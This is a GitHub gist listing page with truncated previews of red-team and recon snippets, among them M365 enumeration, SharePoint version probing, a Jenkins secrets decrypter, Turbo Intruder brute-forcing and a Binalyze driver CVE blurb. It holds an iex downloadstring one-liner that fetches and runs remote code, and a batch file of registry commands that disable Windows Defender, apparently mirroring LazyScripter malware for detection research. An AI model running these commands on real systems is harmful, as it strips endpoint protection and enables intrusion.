HackingLZ
/ m365_osint_recon.py
Created
August 7, 2025 16:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| M365 OSINT Reconnaissance Tool | |
| Based on techniques from: https://dstreefkerk.github.io/2025-07-m365-email-osint-after-lockdown/ | |
| This script performs modern M365/Azure AD reconnaissance after Microsoft's lockdown of traditional | |
| enumeration methods. It uses multiple validation techniques to discover organizational information | |
| and attempts to infer MOERA domains. | |
| """ |
WildeBeast2521
/ tunnel-to-wg.md
Created
June 16, 2025 07:06
A guide to use Cloudflare Tunnel with WireGuard client application
nbk2000
/ getSubsidiaries.py
Created
December 24, 2024 23:36
Get Subsidiaries of a Company from SEC API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| API_KEY = 'API-KEY-GOES-HERE' | |
| # ANSI color codes | |
| BLUE = '\033[94m' | |
| RED = '\033[91m' | |
| PURPLE = '\033[95m' | |
| GREEN = '\033[92m' |
LuemmelSec
/ Get-SPVersionInfo.ps1
Last active
December 9, 2024 10:08
Script to get SharePoint Version and release date remotely
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # To use the function, call it like this: | |
| # iex(new-object net.webclient).downloadstring("https://gist.githubusercontent.com/LuemmelSec/208b8ba52b645ec189031d2b5200f76e/raw/c6c1008da1b5670d3fb549578968c2a2f086a00b/Get-SPVersionInfo.ps1") | |
| # Get-SPVersionInfo -ServerUrl "https://my-sharepointserver" | |
| function Get-SPVersionInfo { | |
| param ( | |
| [string]$ServerUrl, | |
| [switch]$SkipCertificateCheck, # Flag to skip certificate checks | |
| [switch]$SkipHttpErrorCheck # Flag to skip HTTP error handling | |
| ) |
Mike Alfaro (@_mmpte_software) and Tyler Booth (@tyler_dru1d)
An issue in Binalyze IREC.sys v.3.11.0 and before allows a local attacker to execute arbitrary code and escalate privileges due to an improper DACL being applied to the device the driver creates.
Incorrect Acess Control
jhaddix
/ reconftw.cfg
Last active
September 24, 2025 23:27
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################# | |
| # reconFTW config file # | |
| ################################################################# | |
| # General values | |
| tools=~/Tools # Path installed tools | |
| SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path | |
| profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile | |
| reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version | |
| generate_resolvers=false # Generate custom resolvers with dnsvalidator |
djhohnstein
/ JenkinsDecrypter.py
Last active
October 22, 2022 23:23
Decrypt jenkins secrets with all key material from disk
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import re | |
| import sys | |
| import base64 | |
| from hashlib import sha256 | |
| from binascii import hexlify, unhexlify | |
| from Crypto.Cipher import AES | |
| from xml.dom import minidom | |
| from pprint import pprint |
defparam
/ cluster.py
Last active
October 3, 2025 20:00
Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering | |
| # Author: Evan Custodio (@defparam) | |
| # | |
| # MIT License | |
| # Copyright 2021 Evan Custodio | |
| # | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: | |
| # | |
| # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. | |
| # |
MHaggis
/ disablethings.bat
Created
March 2, 2021 17:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat | |
| reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime |
NewerOlder